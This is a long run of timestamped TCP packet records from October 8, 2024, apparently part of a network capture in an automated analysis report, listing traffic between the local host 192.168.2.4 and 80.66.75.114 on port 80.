                                                            Oct 8, 2024 10:08:43.365431070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365658998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365694046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365710020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365731001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365748882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365770102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.365931988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365967035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.365983009 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366004944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.366012096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366034985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.366054058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.366076946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456202984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456329107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456367016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456402063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456408024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456408978 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456434965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456469059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456485033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456504107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456511021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456537962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456557035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456573963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456588984 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456607103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456624985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456641912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456659079 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456676006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456695080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456710100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456723928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456743956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456763029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456780910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.456792116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.456834078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506460905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506485939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506504059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506704092 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506778002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506795883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506813049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506829977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506903887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506962061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506979942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.506990910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.506998062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.507013083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.507034063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.507055044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.507092953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.546822071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.546940088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597004890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597026110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597104073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597106934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597152948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597168922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597184896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597193003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597201109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597213030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597228050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597244978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597311020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597327948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597394943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597691059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597707033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597723007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597748041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597765923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597781897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.597850084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.597901106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646656990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646702051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646725893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646740913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646749973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646755934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646771908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646787882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646805048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.646946907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647062063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647113085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647253990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647270918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.647305012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.647326946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.687683105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.687875032 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.732625008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732649088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732666016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732681036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732697964 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732711077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732728004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732841015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.732841015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.732850075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732867002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732882977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.732903957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.732938051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.732981920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733000994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733016968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733032942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733033895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.733048916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733073950 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.733103991 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.733181953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.733231068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.779114008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779133081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779149055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779185057 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779201031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779215097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.779217005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779232979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779258013 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.779282093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.779895067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779911995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779927015 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779943943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779959917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779977083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.779994011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.780071020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.823251009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.823349953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867228985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867259979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867276907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867357969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867366076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867374897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867366076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867400885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867417097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867434025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867475033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867475986 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867517948 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867578983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867594004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867609024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867624998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867640018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867645979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867655993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867667913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867711067 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.867799997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867814064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.867868900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916408062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916424036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916439056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916553974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916553974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916659117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916675091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916688919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916702986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916718006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916738987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916779995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916811943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916912079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916927099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916930914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916944027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916963100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.916966915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.916987896 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.917020082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.008932114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.008987904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009004116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009017944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009032965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009037018 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009047985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009064913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009068012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009079933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009094954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009099960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009110928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009123087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009126902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009141922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009144068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009157896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009174109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009187937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009190083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.009228945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.009249926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056346893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056382895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056428909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056428909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056436062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056468964 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056485891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056504011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056514978 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056538105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056552887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056572914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056586027 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056607962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056622028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056655884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056828976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056843042 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056858063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.056871891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056896925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.056896925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.057739973 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.057755947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.057770014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.057795048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.057795048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.057826042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147231102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147288084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147305012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147320032 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147336006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147351980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147367954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147386074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147386074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147397041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147386074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147500038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147500038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147612095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147628069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147644043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147658110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147675037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147689104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147705078 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147720098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.147732019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147732019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147762060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147763014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147763014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147763014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147802114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.147802114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.192889929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192907095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192922115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192936897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192953110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192965031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.192967892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192985058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.192987919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193032026 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193077087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193094015 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193108082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193123102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193124056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193124056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193139076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193156958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.193175077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193195105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.193195105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278610945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278647900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278662920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278706074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278722048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278737068 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278759003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278759956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278759956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278832912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278835058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278872967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278887987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278891087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278903008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.278928995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278928995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.278955936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.279584885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279601097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279614925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279628038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279643059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279658079 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.279659033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279674053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279679060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.279690027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.279697895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.279716969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.279748917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.323848009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.323863983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.323872089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.323945999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.323954105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.323968887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.323970079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.323985100 CEST804973080.66.75.114192.168.2.4
